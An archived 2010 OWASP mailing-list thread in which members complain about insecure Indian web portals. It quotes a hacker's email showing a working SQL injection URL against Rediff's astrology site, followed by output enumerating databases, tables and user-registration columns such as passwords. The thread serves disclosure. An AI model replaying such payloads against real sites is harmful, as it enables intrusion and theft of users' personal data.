[OWASP-Bangalore] [Owasp-delhi] Rediff Astrology
Sripathi Krishnan
sripathi.krishnan at gmail.com
Mon Jun 14 13:55:23 EDT 2010
Its not just rediff.com, almost all other Indian portals - in.com,
indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL Injection,
Poor password/session management, open redirects .. the list is endless.
I have written to each of the above portals several times in the past year,
and have given up. IMHO, they are not interested in securing their websites.
--Sri
On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:
> Another one to notify Rediff that readers’ daily fortune can be fixed by
> someone…Seems Rediff needs a lot of OWASP, do inform them that its free!!
>
>
>
> *From:* “Jack H4xor”
> *Sent:* 14 June 2010 12:07
> *To:* dhruv.soi at owasp.org
> *Subject:* Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
>
>
> ********************************************************************
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> + -== MSSQL Information Schema astrology.rediff.com ==- +
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> [ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
>
>
> diac=Scorpiox'
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
> [ + ] Displaying information about MSSQL host !
>
> [ + ] @@VERSION : Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
>
> Aug 6 2000 00:57:48
> Copyright (c) 1988-2000 Microsoft Corporation
> Standard Edition on Windows NT 5.0 (Build 2195: Service
> Pack 4)
>
> [ + ] USER () : dbo
>
> [ + ] S_USER () : astrology
> [ + ] DB_NAME () : astro
> [ + ] HOST_NAME () : ASTROLOGY
> [ + ] SERVER_NAME () : SEARCHDB
> [ + ] SERVER_TYPE () : Microsoft-IIS/6.0
> [ + ] X-POWERED-By () : ASP.NET
>
> [ + ] IP_ADDRESS_INFO : 202.54.124.173
>
>
> [ - ] We Can't get number of Databases !
>
>
> [ ! ] Start dumping database Names !
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
>
> [ DATABASE: 0 ] : astro
>
> [ DATABASE: 1 ] : master
>
>
> [ DATABASE: 2 ] : tempdb
>
>
> [ DATABASE: 3 ] : model
>
>
> [ DATABASE: 4 ] : msdb
>
>
> [ DATABASE: 5 ] : pubs
>
>
> [ DATABASE: 6 ] : Northwind
>
>
> [ DATABASE: 7 ] : travel
>
>
> [ DATABASE: 8 ] : travel_int
>
>
> [ DATABASE: 9 ] : astro
>
>
> [ DATABASE: 10 ] : Jobsearch
>
>
> [ DATABASE: 11 ] : astroyogiD
>
>
> [ DATABASE: 12 ] : matrimonial
>
>
> [ DATABASE: 13 ] : investornew
>
>
> [ DATABASE: 14 ] : test
>
>
>
> [ ! ] Vulnerability Database is : astro
>
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
>
> [ + ] Specify Numbers :> 200
>
>
>
> [ TABLES: 0 ] : ALLIANCE_PARTNER_COMMISSION
>
> [ TABLES: 1 ] : ALLIANCE_PARTNER_MASTER
>
>
> [ TABLES: 2 ] : astrolove
>
>
> [ TABLES: 3 ] : astroparent
>
>
> [ TABLES: 4 ] : CITY
>
>
> [ TABLES: 5 ] : COMPLETE_ORDER_DETAIL
>
>
> [ TABLES: 6 ] : COMPLETE_SUBSCRIPTION_DETAIL
>
>
> [ TABLES: 7 ] : COUNTRY
>
>
> [ TABLES: 8 ] : CUSTOMER_CARE_DETAILS
>
>
> [ TABLES: 9 ] : CUSTOMER_CARE_MASTER
>
>
> [ TABLES: 10 ] : CUSTOMER_PERSON1
>
>
> [ TABLES: 11 ] : CUSTOMER_PERSON2
>
>
> [ TABLES: 12 ] : CUSTOMER_PERSON3
>
>
> [ TABLES: 13 ] : darshtest
>
>
> [ TABLES: 14 ] : dtproperties
>
>
> [ TABLES: 15 ] : FENGSHUI
>
>
> [ TABLES: 16 ] : FRANCHISEE_MASTER
>
>
> [ TABLES: 17 ] : idealmate
>
>
> [ TABLES: 18 ] : INTERNATIONAL_PARTNER_MASTER
>
>
> [ TABLES: 19 ] : NUMEROLOGY
>
>
> [ TABLES: 20 ] : ORDER_DETAILS
>
>
> [ TABLES: 21 ] : ORDER_MASTER
>
>
> [ TABLES: 22 ] : ORDER_REMARKS
>
>
> [ TABLES: 23 ] : ORDERS
>
>
> [ TABLES: 24 ] : p1
>
>
> [ TABLES: 25 ] : p3master
>
>
> [ TABLES: 26 ] : PALMISTRY
>
>
> [ TABLES: 27 ] : PAYMENT_METHOD_MASTER
>
>
> [ TABLES: 28 ] : PROBLEM_ANSWER
>
>
> [ TABLES: 29 ] : PROBLEM_CATEGORY
>
>
> [ TABLES: 30 ] : REGISTRATION
>
>
> [ TABLES: 31 ] : SHIPPING_DETAILS
>
>
> [ TABLES: 32 ] : SPCFIC_ANLYS
>
>
> [ TABLES: 33 ] : SUBSCRIBER_DETAILS
>
>
> [ TABLES: 34 ] : SUBSCRIBER_MASTER
>
>
> [ TABLES: 35 ] : SUBSCRIBER_REGISTRATION
>
>
> [ TABLES: 36 ] : SUBSCRIBER_TRANSACTION
>
>
> [ TABLES: 37 ] : SUBSCRIPTION_DETAILS
>
>
> [ TABLES: 38 ] : SUBSCRIPTION_MASTER
>
>
> [ TABLES: 39 ] : sysconstraints
>
>
> [ TABLES: 40 ] : syssegments
>
>
> [ TABLES: 41 ] : test
>
>
> [ TABLES: 42 ] : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
>
> [ TABLES: 43 ] : zodiac
>
>
>
> [ + ] Done !
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
>
> [ ? ] Numbers of Columns To Display ?
>
>
> [ + ] Specify Numbers :> 50
>
>
>
> [ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro
>
>
>
> [ COLUMNS : REGISTRATION ] 0 ] : FRANCHISEE_ID
>
> [ COLUMNS : REGISTRATION ] 1 ] : PARTNER_ID
>
>
> [ COLUMNS : REGISTRATION ] 2 ] : REGISTRATION_ADDRESS
>
>
> [ COLUMNS : REGISTRATION ] 3 ] : REGISTRATION_BIRTH_COUNTRY
>
>
> [ COLUMNS : REGISTRATION ] 4 ] : REGISTRATION_BIRTH_DATE
>
>
> [ COLUMNS : REGISTRATION ] 5 ] : REGISTRATION_BIRTH_PLACE
>
>
> [ COLUMNS : REGISTRATION ] 6 ] : REGISTRATION_BIRTH_TIME_HOUR
>
>
> [ COLUMNS : REGISTRATION ] 7 ] : REGISTRATION_BIRTH_TIME_MINUTES
>
>
> [ COLUMNS : REGISTRATION ] 8 ] : REGISTRATION_CELL_NO
>
>
> [ COLUMNS : REGISTRATION ] 9 ] : REGISTRATION_COUNTRY
>
>
> [ COLUMNS : REGISTRATION ] 10 ] : REGISTRATION_DATE
>
>
> [ COLUMNS : REGISTRATION ] 11 ] : REGISTRATION_EMAIL_ID
>
>
> [ COLUMNS : REGISTRATION ] 12 ] : REGISTRATION_FIRSTNAME
>
>
> [ COLUMNS : REGISTRATION ] 13 ] : REGISTRATION_GENDER
>
>
> [ COLUMNS : REGISTRATION ] 14 ] : REGISTRATION_ID
>
>
> [ COLUMNS : REGISTRATION ] 15 ] : REGISTRATION_IP
>
>
> [ COLUMNS : REGISTRATION ] 16 ] : REGISTRATION_LASTNAME
>
>
> [ COLUMNS : REGISTRATION ] 17 ] : REGISTRATION_PASSWORD
>
>
> [ COLUMNS : REGISTRATION ] 18 ] : REGISTRATION_TELEPHONE_NO
>
>
> [ COLUMNS : REGISTRATION ] 19 ] : REGISTRATION_USERNAME
>
>
>
> [ ! ] Done !
>
>
> [ ! ] All information was recorded in astrology.rediff.com.txt file !
>
>
>
> [ 1 ] : Return to Tables !
>
> [ 2 ] : Return to Columns !
>
>
>
> [ ? ] : Oprion :>
>
>
>
> Thanks & Regards
> Jackh4xor
> ( h4cky0u )
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-bangalore/attachments/20100614/ea8dcc7f/attachment-0001.html
More information about the OWASP-Bangalore
mailing list